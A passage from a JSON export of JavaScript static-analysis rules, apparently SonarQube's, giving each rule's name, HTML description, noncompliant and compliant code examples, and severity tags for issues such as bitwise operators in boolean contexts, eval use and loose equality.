- Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&&<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a & b) { ... } \/\/ Noncompliant; & used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a && b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code><<<\/code>, <code>>>><\/code>, <code>>><\/code>,\n<code>~<\/code>, <code>&=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code><<=<\/code>, <code>>>=<\/code>, <code>>>>=<\/code> and\n<code>&<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n if (arguments.length == 0) { \/\/ Compliant\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n if (arguments.length == 0) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n if (x === 2) {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined && x === 2) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i == 5) {\n continue; \/* Noncompliant *\/\n }\n alert(\"i = \" + i);\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i != 5) { \/* Compliant *\/\n alert(\"i = \" + i);\n }\n }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n} else {\n throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n doSomething(name); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n if (object.hasOwnProperty(name)) {\n doSomething(name);\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n a[prop] = obj[prop]; \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n <li> <code>await<\/code> <\/li>\n <li> <code>class<\/code> <\/li>\n <li> <code>const<\/code> <\/li>\n <li> <code>enum<\/code> <\/li>\n <li> <code>export<\/code> <\/li>\n <li> <code>extends<\/code> <\/li>\n <li> <code>implements<\/code> <\/li>\n <li> <code>import<\/code> <\/li>\n <li> <code>interface<\/code> <\/li>\n <li> <code>let<\/code> <\/li>\n <li> <code>package<\/code> <\/li>\n <li> <code>private<\/code> <\/li>\n <li> <code>protected<\/code> <\/li>\n <li> <code>public<\/code> <\/li>\n <li> <code>static<\/code> <\/li>\n <li> <code>super<\/code> <\/li>\n <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true }; \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) { \/\/ Noncompliant\n if (i == 12) {\n print(\"12\");\n break myLabel;\n }\n print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i < 10; i++) { \/\/ Compliant\n print(\"Loop\");\n break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n \/* ... *\/\n if (condition2) { \/\/ Compliant - depth = 2\n \/* ... *\/\n for(int i = 0; i < 10; i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed "if\/for\/while\/switch\/try" statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n alert('hi'); \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{ \/\/Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) { \/\/Compliant\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n { \/\/Compliant\n g: \"someValue\"\n }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n return numerator \/ denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n WEDNESDAY: \/\/ instead of \"case WEDNESDAY\"\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n foo:for(i = 0 ; i < X ; i++) {\n \/* ... *\/\n break foo; \/\/ this break statement doesn't relate to the nesting case TUESDAY\n \/* ... *\/\n }\n break;\n \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n case WEDNESDAY:\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n break;\n\n \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n function open() { \/\/ Classic function declaration; not ignored\n \/\/ ...\n }\n\n function read() {\n \/\/ ...\n }\n\n function readlines() {\n \/\/ ...\n }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doFirstThing();\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50)) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doFirstThing();\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) { \/\/ Noncompliant\n \/\/ ...\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++, j++) {\n \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i < 10; i++) {\n \/\/ ...\n j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined; \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not 